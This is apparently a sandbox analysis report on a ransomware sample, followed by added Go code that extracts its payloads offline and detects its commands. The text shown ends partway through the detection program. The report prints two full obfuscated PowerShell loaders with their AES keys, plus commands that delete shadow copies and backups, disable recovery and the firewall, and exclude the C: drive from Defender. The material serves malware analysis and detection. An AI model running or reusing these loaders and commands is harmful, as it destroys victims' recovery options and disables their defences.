Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 (SeIncreaseWorkingSetPrivilege; LUID not resolved by the sandbox) N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 (SeTimeZonePrivilege; LUID not resolved by the sandbox) N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 (SeCreateSymbolicLinkPrivilege; LUID not resolved by the sandbox) N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 (SeDelegateSessionUserImpersonatePrivilege; LUID not resolved by the sandbox) N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\E4D8.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1960 wrote to memory of 3656 N/A C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138.exe C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138.exe
PID 1960 wrote to memory of 3656 N/A C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138.exe C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138.exe
PID 1960 wrote to memory of 3656 N/A C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138.exe C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138.exe
PID 1960 wrote to memory of 3656 N/A C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138.exe C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138.exe
PID 1960 wrote to memory of 3656 N/A C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138.exe C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138.exe
PID 1960 wrote to memory of 3656 N/A C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138.exe C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138.exe
PID 2636 wrote to memory of 4200 N/A N/A C:\Users\Admin\AppData\Local\Temp\D5D3.exe
PID 2636 wrote to memory of 4200 N/A N/A C:\Users\Admin\AppData\Local\Temp\D5D3.exe
PID 2636 wrote to memory of 1168 N/A N/A C:\Users\Admin\AppData\Local\Temp\E4D8.exe
PID 2636 wrote to memory of 1168 N/A N/A C:\Users\Admin\AppData\Local\Temp\E4D8.exe
PID 2636 wrote to memory of 1168 N/A N/A C:\Users\Admin\AppData\Local\Temp\E4D8.exe
PID 2636 wrote to memory of 1816 N/A N/A C:\Users\Admin\AppData\Local\Temp\E834.exe
PID 2636 wrote to memory of 1816 N/A N/A C:\Users\Admin\AppData\Local\Temp\E834.exe
PID 2636 wrote to memory of 1816 N/A N/A C:\Users\Admin\AppData\Local\Temp\E834.exe
PID 2636 wrote to memory of 4480 N/A N/A C:\Users\Admin\AppData\Local\Temp\EA96.exe
PID 2636 wrote to memory of 4480 N/A N/A C:\Users\Admin\AppData\Local\Temp\EA96.exe
PID 2636 wrote to memory of 4480 N/A N/A C:\Users\Admin\AppData\Local\Temp\EA96.exe
PID 2636 wrote to memory of 2424 N/A N/A C:\Users\Admin\AppData\Local\Temp\ED76.exe
PID 2636 wrote to memory of 2424 N/A N/A C:\Users\Admin\AppData\Local\Temp\ED76.exe
PID 2636 wrote to memory of 2424 N/A N/A C:\Users\Admin\AppData\Local\Temp\ED76.exe
PID 2636 wrote to memory of 4552 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 2636 wrote to memory of 4552 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 2636 wrote to memory of 4552 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 2636 wrote to memory of 4552 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 1816 wrote to memory of 1284 N/A C:\Users\Admin\AppData\Local\Temp\E834.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1816 wrote to memory of 1284 N/A C:\Users\Admin\AppData\Local\Temp\E834.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1816 wrote to memory of 1284 N/A C:\Users\Admin\AppData\Local\Temp\E834.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2636 wrote to memory of 1668 N/A N/A C:\Windows\explorer.exe
PID 2636 wrote to memory of 1668 N/A N/A C:\Windows\explorer.exe
PID 2636 wrote to memory of 1668 N/A N/A C:\Windows\explorer.exe
PID 2636 wrote to memory of 452 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 2636 wrote to memory of 452 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 2636 wrote to memory of 452 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 2636 wrote to memory of 452 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 2636 wrote to memory of 1164 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 2636 wrote to memory of 1164 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 2636 wrote to memory of 1164 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 2636 wrote to memory of 1164 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 2636 wrote to memory of 2324 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 2636 wrote to memory of 2324 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 2636 wrote to memory of 2324 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 2636 wrote to memory of 2324 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 2636 wrote to memory of 2056 N/A N/A C:\Windows\explorer.exe
PID 2636 wrote to memory of 2056 N/A N/A C:\Windows\explorer.exe
PID 2636 wrote to memory of 2056 N/A N/A C:\Windows\explorer.exe
PID 2636 wrote to memory of 1248 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 2636 wrote to memory of 1248 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 2636 wrote to memory of 1248 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 2636 wrote to memory of 1248 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 4480 wrote to memory of 1204 N/A C:\Users\Admin\AppData\Local\Temp\EA96.exe C:\Windows\system32\cmd.exe
PID 4480 wrote to memory of 1204 N/A C:\Users\Admin\AppData\Local\Temp\EA96.exe C:\Windows\system32\cmd.exe
PID 4480 wrote to memory of 4548 N/A C:\Users\Admin\AppData\Local\Temp\EA96.exe C:\Windows\system32\cmd.exe
PID 4480 wrote to memory of 4548 N/A C:\Users\Admin\AppData\Local\Temp\EA96.exe C:\Windows\system32\cmd.exe
PID 2636 wrote to memory of 4476 N/A N/A C:\Windows\explorer.exe
PID 2636 wrote to memory of 4476 N/A N/A C:\Windows\explorer.exe
PID 2636 wrote to memory of 4476 N/A N/A C:\Windows\explorer.exe
PID 2636 wrote to memory of 1036 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 2636 wrote to memory of 1036 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 2636 wrote to memory of 1036 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 2636 wrote to memory of 1036 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 4548 wrote to memory of 4376 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 4548 wrote to memory of 4376 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1204 wrote to memory of 4680 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 1204 wrote to memory of 4680 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\vssadmin.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy service COM API

ransomware

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-922299981-3641064733-3870770889-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\explorer.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-922299981-3641064733-3870770889-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\explorer.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138.exe

"C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138.exe"

C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138.exe

"C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138.exe"

C:\Users\Admin\AppData\Local\Temp\D5D3.exe

C:\Users\Admin\AppData\Local\Temp\D5D3.exe

C:\Users\Admin\AppData\Local\Temp\E4D8.exe

C:\Users\Admin\AppData\Local\Temp\E4D8.exe

C:\Users\Admin\AppData\Local\Temp\E834.exe

C:\Users\Admin\AppData\Local\Temp\E834.exe

C:\Users\Admin\AppData\Local\Temp\EA96.exe

C:\Users\Admin\AppData\Local\Temp\EA96.exe

C:\Users\Admin\AppData\Local\Temp\ED76.exe

C:\Users\Admin\AppData\Local\Temp\ED76.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Users\Admin\AppData\Local\Temp\EA96.exe

"C:\Users\Admin\AppData\Local\Temp\EA96.exe"

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 4812 -ip 4812

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4812 -s 216

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe"

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\vssadmin.exe

vssadmin delete shadows /all /quiet

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=disable

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\System32\Wbem\WMIC.exe

wmic shadowcopy delete

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} recoveryenabled no

C:\Windows\system32\wbadmin.exe

wbadmin delete catalog -quiet

C:\Windows\system32\wbengine.exe

"C:\Windows\system32\wbengine.exe"

C:\Windows\System32\vdsldr.exe

C:\Windows\System32\vdsldr.exe -Embedding

C:\Windows\System32\vds.exe

C:\Windows\System32\vds.exe

C:\Users\Admin\AppData\Local\Temp\E4D8.exe

"C:\Users\Admin\AppData\Local\Temp\E4D8.exe"

C:\Users\Admin\AppData\Local\Temp\E4D8.exe

"C:\Users\Admin\AppData\Local\Temp\E4D8.exe"

C:\Users\Admin\AppData\Local\Temp\E4D8.exe

"C:\Users\Admin\AppData\Local\Temp\E4D8.exe"

C:\Users\Admin\AppData\Local\Temp\E4D8.exe

"C:\Users\Admin\AppData\Local\Temp\E4D8.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SRD.bat" "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\sv.bat" "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\SRD.bat"

C:\Users\Admin\AppData\Local\Temp\SRD.bat.exe

"C:\Users\Admin\AppData\Local\Temp\SRD.bat.exe" -w hidden -c $RwDC='InVBDevokVBDeeVBDe'.Replace('VBDe', '');$IGVN='CreVBDeatVBDeeDecVBDeryptVBDeorVBDe'.Replace('VBDe', '');$qKLC='LoaVBDedVBDe'.Replace('VBDe', '');$fwfx='TVBDeranVBDesfVBDeorVBDemVBDeFinVBDeaVBDelVBDeBlVBDeocVBDekVBDe'.Replace('VBDe', '');$QupE='FrVBDeoVBDemBaVBDese6VBDe4StVBDeriVBDengVBDe'.Replace('VBDe', '');$GEjb='ChVBDeangVBDeeEVBDextVBDeenVBDesionVBDe'.Replace('VBDe', '');$XbqZ='ReaVBDedLiVBDenesVBDe'.Replace('VBDe', '');$dNNl='ElVBDeemeVBDentVBDeAtVBDe'.Replace('VBDe', '');$niMU='EVBDentVBDeryPVBDeoinVBDetVBDe'.Replace('VBDe', '');$CXFs='GetCVBDeurVBDereVBDenVBDetPVBDerocVBDeessVBDe'.Replace('VBDe', '');$tMEM='SplVBDeitVBDe'.Replace('VBDe', '');$yGFh='MaVBDeinVBDeModVBDeulVBDeeVBDe'.Replace('VBDe', '');function RcHQK($SJfnN){$ePbJG=[System.Security.Cryptography.Aes]::Create();$ePbJG.Mode=[System.Security.Cryptography.CipherMode]::CBC;$ePbJG.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$ePbJG.Key=[System.Convert]::$QupE('JDkzO6XH5gH021W2Y/ObVS2k+/ofiQdjxBF86RM/vL8=');$ePbJG.IV=[System.Convert]::$QupE('TPQFXcwHNdZ9KljZbDDnEA==');$uQtJU=$ePbJG.$IGVN();$QRiSY=$uQtJU.$fwfx($SJfnN,0,$SJfnN.Length);$uQtJU.Dispose();$ePbJG.Dispose();$QRiSY;}function nTqSF($SJfnN){$vKyUA=New-Object System.IO.MemoryStream(,$SJfnN);$flWoW=New-Object System.IO.MemoryStream;$gLlPI=New-Object System.IO.Compression.GZipStream($vKyUA,[IO.Compression.CompressionMode]::Decompress);$gLlPI.CopyTo($flWoW);$gLlPI.Dispose();$vKyUA.Dispose();$flWoW.Dispose();$flWoW.ToArray();}$fsXoM=[System.Linq.Enumerable]::$dNNl([System.IO.File]::$XbqZ([System.IO.Path]::$GEjb([System.Diagnostics.Process]::$CXFs().$yGFh.FileName, $null)), 1);$JMYTy=$fsXoM.Substring(2).$tMEM(':');$fhNaK=nTqSF (RcHQK ([Convert]::$QupE($JMYTy[0])));$Prmhn=nTqSF (RcHQK ([Convert]::$QupE($JMYTy[1])));[System.Reflection.Assembly]::$qKLC([byte[]]$Prmhn).$niMU.$RwDC($null,$null);[System.Reflection.Assembly]::$qKLC([byte[]]$fhNaK).$niMU.$RwDC($null,$null);

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\sv.bat"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAA==
(the -enc argument is base64 over UTF-16LE and decodes to: Set-MpPreference -ExclusionPath C:\ which excludes the entire system drive from Microsoft Defender scanning)

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

C:\Windows\Microsoft.NET/Framework/v4.0.30319/aspnet_compiler.exe

C:\Users\Admin\AppData\Local\Temp\sv.bat.exe

"C:\Users\Admin\AppData\Local\Temp\sv.bat.exe" -w hidden -c $QmQC='ElwQysewQysmwQysentwQysAwQystwQys'.Replace('wQys', '');$Cvyq='LowQysadwQys'.Replace('wQys', '');$Abka='GetwQysCurwQysrenwQystwQysProwQyscewQyssswQys'.Replace('wQys', '');$kkEJ='CrwQyseawQystewQysDewQyscrwQysyptwQysorwQys'.Replace('wQys', '');$uvnc='FrwQysomwQysBaswQyse64wQysStrwQysinwQysgwQys'.Replace('wQys', '');$oAYO='EwQysnwQystryPwQysowQysinwQystwQys'.Replace('wQys', '');$eVXi='ChawQysnwQysgewQysExwQystenwQyssiwQysowQysnwQys'.Replace('wQys', '');$KwUx='MwQysainwQysMowQysdwQysulwQysewQys'.Replace('wQys', '');$Nyws='InvowQyskewQys'.Replace('wQys', '');$JsiC='RwQyseadwQysLiwQysnewQysswQys'.Replace('wQys', '');$xxaz='SwQyspwQysliwQystwQys'.Replace('wQys', '');$OtLn='TrawQysnsfwQysormwQysFinwQysalwQysBlocwQyskwQys'.Replace('wQys', '');function coZUI($OpQVj){$aZVET=[System.Security.Cryptography.Aes]::Create();$aZVET.Mode=[System.Security.Cryptography.CipherMode]::CBC;$aZVET.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$aZVET.Key=[System.Convert]::$uvnc('iQPIhpce7ki6o+IHmlOhdoHm7HC8khIfOxAgdAkNw7A=');$aZVET.IV=[System.Convert]::$uvnc('NkX2UOU09KDD8//UYPJBsg==');$RGpCI=$aZVET.$kkEJ();$aARwL=$RGpCI.$OtLn($OpQVj,0,$OpQVj.Length);$RGpCI.Dispose();$aZVET.Dispose();$aARwL;}function fvMWD($OpQVj){$EEpkF=New-Object System.IO.MemoryStream(,$OpQVj);$pDChj=New-Object System.IO.MemoryStream;$BBOEV=New-Object System.IO.Compression.GZipStream($EEpkF,[IO.Compression.CompressionMode]::Decompress);$BBOEV.CopyTo($pDChj);$BBOEV.Dispose();$EEpkF.Dispose();$pDChj.Dispose();$pDChj.ToArray();}$YoalJ=[System.Linq.Enumerable]::$QmQC([System.IO.File]::$JsiC([System.IO.Path]::$eVXi([System.Diagnostics.Process]::$Abka().$KwUx.FileName, $null)), 1);$ZnOcq=$YoalJ.Substring(2).$xxaz(':');$njBYj=fvMWD (coZUI ([Convert]::$uvnc($ZnOcq[0])));$BkieQ=fvMWD (coZUI ([Convert]::$uvnc($ZnOcq[1])));[System.Reflection.Assembly]::$Cvyq([byte[]]$BkieQ).$oAYO.$Nyws($null,$null);[System.Reflection.Assembly]::$Cvyq([byte[]]$njBYj).$oAYO.$Nyws($null,$null);
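
The two .bat.exe command lines above are one self-contained .NET loader with the string-splitting obfuscation removed: the script opens the file it was launched from with the extension stripped (ChangeExtension(MainModule.FileName, $null), so SRD.bat.exe reads SRD.bat and sv.bat.exe reads sv.bat), takes line 2, drops its first two characters, splits the rest on ':', and for each part does base64-decode, AES-CBC decrypt with the hard-coded 32-byte key and 16-byte IV, then GZip-decompress, before calling Assembly.Load on the result and invoking its entry point (second part first, then the first). The Go program below is an added example and is not part of this report or of the sample: it re-implements that pipeline as an offline extractor that loads and runs nothing, so the embedded assemblies can be carved out of SRD.bat for static analysis. The key and IV are copied from the SRD.bat.exe command line. BuildSampleBat, the "@echo off" first line and the "::" prefix on the data line are constructed assumptions used only to build a test fixture, because the real SRD.bat content is not reproduced on this page.

```go
package main

import (
	"bytes"
	"compress/gzip"
	"crypto/aes"
	"crypto/cipher"
	"encoding/base64"
	"fmt"
	"io"
	"strings"
)

// Key and IV copied verbatim from the SRD.bat.exe command line in this report.
var (
	SRDKey, _ = base64.StdEncoding.DecodeString("JDkzO6XH5gH021W2Y/ObVS2k+/ofiQdjxBF86RM/vL8=")
	SRDIV, _  = base64.StdEncoding.DecodeString("TPQFXcwHNdZ9KljZbDDnEA==")
)

// aesCBCDecrypt mirrors the loader's decrypt helper: AES-CBC with PKCS7 padding.
func aesCBCDecrypt(key, iv, ct []byte) ([]byte, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	if len(ct) == 0 || len(ct)%aes.BlockSize != 0 {
		return nil, fmt.Errorf("ciphertext is not a whole number of AES blocks")
	}
	pt := make([]byte, len(ct))
	cipher.NewCBCDecrypter(block, iv).CryptBlocks(pt, ct)
	pad := int(pt[len(pt)-1]) // validate and strip the PKCS7 padding
	if pad == 0 || pad > aes.BlockSize || !bytes.Equal(pt[len(pt)-pad:], bytes.Repeat([]byte{byte(pad)}, pad)) {
		return nil, fmt.Errorf("bad PKCS7 padding (wrong key or IV?)")
	}
	return pt[:len(pt)-pad], nil
}

// decodePart handles one ':'-separated chunk: base64 -> AES-CBC -> gunzip.
func decodePart(key, iv []byte, part string) ([]byte, error) {
	ct, err := base64.StdEncoding.DecodeString(part)
	if err != nil {
		return nil, err
	}
	pt, err := aesCBCDecrypt(key, iv, ct)
	if err != nil {
		return nil, err
	}
	zr, err := gzip.NewReader(bytes.NewReader(pt))
	if err != nil {
		return nil, err
	}
	return io.ReadAll(zr)
}

// ExtractPayloads repeats the loader's own steps on the .bat text but stops short
// of Assembly.Load/EntryPoint.Invoke: line 2, minus its first two characters,
// split on ':'. Blobs come back in file order; the loader runs the second first.
func ExtractPayloads(batText string, key, iv []byte) ([][]byte, error) {
	lines := strings.Split(strings.ReplaceAll(batText, "\r\n", "\n"), "\n")
	if len(lines) < 2 || len(lines[1]) < 2 {
		return nil, fmt.Errorf("no data line at line 2 of the .bat file")
	}
	var blobs [][]byte
	for i, part := range strings.Split(lines[1][2:], ":") {
		raw, err := decodePart(key, iv, part)
		if err != nil {
			return nil, fmt.Errorf("part %d: %w", i, err)
		}
		blobs = append(blobs, raw)
	}
	return blobs, nil
}

// BuildSampleBat is the inverse pipeline (gzip -> AES-CBC/PKCS7 -> base64), used only to
// build an offline fixture: the real SRD.bat is not on the page, and its "@echo off" first
// line and "::" data-line prefix are assumptions about its layout.
func BuildSampleBat(key, iv []byte, payloads ...[]byte) string {
	block, _ := aes.NewCipher(key) // key length is validated on the decrypt path
	var parts []string
	for _, p := range payloads {
		var gz bytes.Buffer
		zw := gzip.NewWriter(&gz)
		zw.Write(p)
		zw.Close()
		pad := aes.BlockSize - gz.Len()%aes.BlockSize
		padded := append(gz.Bytes(), bytes.Repeat([]byte{byte(pad)}, pad)...)
		ct := make([]byte, len(padded))
		cipher.NewCBCEncrypter(block, iv).CryptBlocks(ct, padded)
		parts = append(parts, base64.StdEncoding.EncodeToString(ct))
	}
	return "@echo off\r\n::" + strings.Join(parts, ":") + "\r\n"
}

func main() {
	// Constructed stand-ins for the two embedded .NET assemblies.
	bat := BuildSampleBat(SRDKey, SRDIV, []byte("MZ first assembly"), []byte("MZ second assembly"))
	blobs, err := ExtractPayloads(bat, SRDKey, SRDIV)
	fmt.Printf("%d payloads, err=%v, joined: %s\n", len(blobs), err, bytes.Join(blobs, []byte(" | ")))
}
```

To use it on the real file, read SRD.bat into batText and write each returned blob to disk; for sv.bat substitute the key and IV from the sv.bat.exe command line (iQPIhpce7ki6o+IHmlOhdoHm7HC8khIfOxAgdAkNw7A= and NkX2UOU09KDD8//UYPJBsg==). A real payload starts with MZ; a padding or gzip error almost always means the wrong key/IV pair was supplied, which is why the PKCS7 check rejects garbage instead of passing it to the gzip reader.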

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\SRD')

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(4312);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;

C:\Users\Admin\AppData\Local\FallbackBuffer\tzvkgtxv\PublicKey.exe

C:\Users\Admin\AppData\Local\FallbackBuffer\tzvkgtxv\PublicKey.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\sv')

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(5996);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;
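
The process list above records the recovery-inhibition and defence-evasion chain in plain text: shadow copies deleted twice (vssadmin and wmic), Windows recovery turned off with bcdedit, the backup catalog deleted with wbadmin, the firewall disabled with both netsh syntaxes, and a Defender exclusion set through an encoded PowerShell command. The Go program below is an added example and is not part of this report: it decodes -enc arguments (base64 over UTF-16LE, not UTF-8) and runs a small rule set over the command lines copied from this report, with the WerFault line as a negative control. The rules cover only what this page records and the labels are the example's own names, not the sandbox's signature names; a production rule set would be broader.

```go
package main

import (
	"encoding/base64"
	"fmt"
	"regexp"
	"strings"
	"unicode/utf16"
)

// DecodeEncodedCommand decodes a powershell.exe -enc / -EncodedCommand argument,
// which is base64 over UTF-16LE text.
func DecodeEncodedCommand(b64 string) (string, error) {
	raw, err := base64.StdEncoding.DecodeString(b64)
	if err != nil {
		return "", err
	}
	if len(raw)%2 != 0 {
		return "", fmt.Errorf("%d bytes is not UTF-16LE", len(raw))
	}
	u := make([]uint16, len(raw)/2)
	for i := range u {
		u[i] = uint16(raw[2*i]) | uint16(raw[2*i+1])<<8
	}
	return string(utf16.Decode(u)), nil
}

// encArg matches the -e/-ec/-enc/-EncodedCommand switch but not -ExecutionPolicy.
var encArg = regexp.MustCompile(`(?i)-(?:encodedcommand|enc|ec|e)\b\s+([A-Za-z0-9+/=]+)`)

// impactRules are evaluated against the lowercased command line plus any decoded
// -enc script. They cover exactly the commands recorded in this report's
// process list; the labels are this example's own names.
var impactRules = []struct {
	label string
	re    *regexp.Regexp
}{
	{"shadow-copies-deleted", regexp.MustCompile(`vssadmin(\.exe)?\s+delete\s+shadows|wmic(\.exe)?\s+shadowcopy\s+delete`)},
	{"boot-recovery-disabled", regexp.MustCompile(`bcdedit(\.exe)?\s+/set\s+\{default\}\s+(recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)`)},
	{"backup-catalog-deleted", regexp.MustCompile(`wbadmin(\.exe)?\s+delete\s+catalog`)},
	{"firewall-disabled", regexp.MustCompile(`netsh(\.exe)?\s+(advfirewall\s+set\s+\w+\s+state\s+off|firewall\s+set\s+opmode\s+mode=disable)`)},
	{"defender-exclusion-added", regexp.MustCompile(`set-mppreference\s+-exclusionpath`)},
}

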